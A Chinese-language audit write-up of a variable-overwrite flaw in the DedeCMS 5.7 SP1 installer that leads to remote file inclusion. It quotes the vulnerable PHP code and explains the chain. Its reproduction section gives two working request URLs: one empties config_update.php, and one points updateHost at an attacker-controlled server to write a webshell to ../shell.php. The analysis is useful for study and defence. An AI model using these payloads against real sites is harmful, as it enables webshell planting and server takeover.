dedecmsv5.7sp1远程文件包含漏洞审计

dedecms5.7 sp1版本存在远程文件包含漏洞，在此记录审计复现漏洞过程。

漏洞在/install/index.php(index.php.bak)文件中，漏洞起因是$$符号使用不当，导致变量覆盖以至于最后引起远程文件包含漏洞。

0x01 变量覆盖

看代码的18-39行

$insLockfile = dirname(__FILE__).'/install_lock.txt';

$moduleCacheFile = dirname(__FILE__).'/modules.tmp.inc';

define('DEDEINC',dirname(__FILE__).'/../include');

define('DEDEDATA',dirname(__FILE__).'/../data');

define('DEDEROOT',preg_replace("#[\\\\\/]install#", '', dirname(__FILE__)));

header("Content-Type: text/html; charset={$s_lang}");

require_once(DEDEROOT.'/install/install.inc.php');

require_once(DEDEINC.'/zip.class.php');

foreach(Array('_GET','_POST','_COOKIE') as $_request)

{

    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);

}

require_once(DEDEINC.'/common.func.php');

if(file_exists($insLockfile))

{

    exit(" 程序已运行安装，如果你确定要重新安装，请先从FTP中删除 install/install_lock.txt！");

}

红色标记的代码段就是变量覆盖产生的地方，大致意思是将get,post或者cookie方式传入的值通过foreach以键值对的方式输出，例如在url中输入 ?str=hello,则$_k的值就是str，$_v的值就是hello 所以 ${$_K}就是$str，这里很明显的变量覆盖了。后面的RunMagicQuotes函数在另一个文件中定义的，在这里理解为返回参数内容就好了。

0x02 结合变量覆盖构造远程文件包含

只有变量覆盖漏洞暂时还不够，我们接着往下看。跳到代码的最后几行（373-387）

else if($step==11)

{

    require_once('../data/admin/config_update.php');

    $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";

    $sql_content = file_get_contents($rmurl);

    $fp = fopen($install_demo_name,'w');

    if(fwrite($fp,$sql_content))

        echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';

    else

        echo '&nbsp; <font color="red">[×]</font> 远程获取失败';

    unset($sql_content);

    fclose($fp);

    exit();

}

这段代码块引入了 /data/admin/config_update.php文件，文件内容为

<?php

/**

 * 更新服务器，如果有变动，请到 http://bbs.dedecms.com 查询

 *

 * @version        $Id: config_update.php 1 11:36 2011-2-21 tianya $

 * @package        DedeCMS.Administrator

 * @copyright      Copyright (c) 2007 - 2010, DesDev, Inc.

 * @license        http://help.dedecms.com/usersguide/license.html

 * @link           http://www.dedecms.com

 */

//更新服务器，如果有变动，请到 http://bbs.dedecms.com 查询

$updateHost = 'http://updatenew.dedecms.com/base-v57/';

$linkHost = 'http://flink.dedecms.com/server_url.php';

这里定义了变量updateHost，继续看373-387行代码，$updateHost与"dedecms/demodata.{$s_lang}.txt"拼接为字符串，并利用file_get_contents函数读取demodata.{$s_lang}.txt文件内容，最后将该文件内容写入到$install_demo_name = 'dedev57demo.txt'文件中，因此我们可以结合上面的变量覆盖漏洞来进行远程文件包含，直接写webshell。由于$updateHost变量是引入进来的所以不能直接进行覆盖，需要先将config_update.php文件清空再包含。

0x03 漏洞复现

访问/install/index.php(index.php.bak)，查看文件是否存在。

存在。构造payload再次访问，此时清空config_update.php文件。

/install/index.php?step=11&s_lang=evi1code&insLockfile=evi1code&install_demo_name=../data/admin/config_update.php

可以看到文件已经被清空，这时我们就可以利用变量覆盖来远程包含我们的文件了。

/install/index.php?step=11&s_lang=evi1code&insLockfile=evi1code&install_demo_name=../shell.php&updateHost=http://127.0.0.1/

至此漏洞复现成功。

知其然知其所以然。